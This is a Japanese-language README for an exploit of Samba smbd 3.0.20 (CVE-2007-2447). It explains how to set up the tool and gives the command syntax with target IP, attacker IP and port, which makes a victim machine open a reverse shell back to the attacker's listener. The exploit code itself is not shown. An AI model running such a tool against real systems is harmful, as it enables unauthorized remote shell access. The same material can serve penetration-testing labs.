
このリポジトリには、Samba smbd 3.0.20 (CVE-2007-2447) 用のエクスプロイトが含まれており、細工されたSMBリクエストを介したリモートコマンド実行を可能にします。
このエクスプロイトには Python 3 といくつかの依存関係が必要です。エクスプロイトを実行する前に仮想環境をセットアップすることをお勧めします。
リポジトリをクローンする:
git clone https://github.com/your-repo/CVE-2007-2447.git
cd CVE-2007-2447
Python仮想環境を作成する:
python3 -m venv smb_env
source smb_env/bin/activate # Linux/macOS
(Windowsユーザーは smb_env\Scripts\activate で有効化できます)
必要な依存関係をインストールする:
pip install -r requirements.txt
仮想環境がセットアップされたら、次の構文でエクスプロイトを実行できます:
python3 CVE-2007-2447.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
python3 CVE-2007-2447.py -t 192.168.1.100 -a 192.168.1.50 -p 4444
-t / --target: ターゲット(被害者)マシンのIPアドレス。-a / --attacker: 攻撃者のリスナーのIPアドレス。-p / --port: リバースシェル接続を確立するポート。終了したら、次のコマンドで仮想環境を無効化します:
deactivate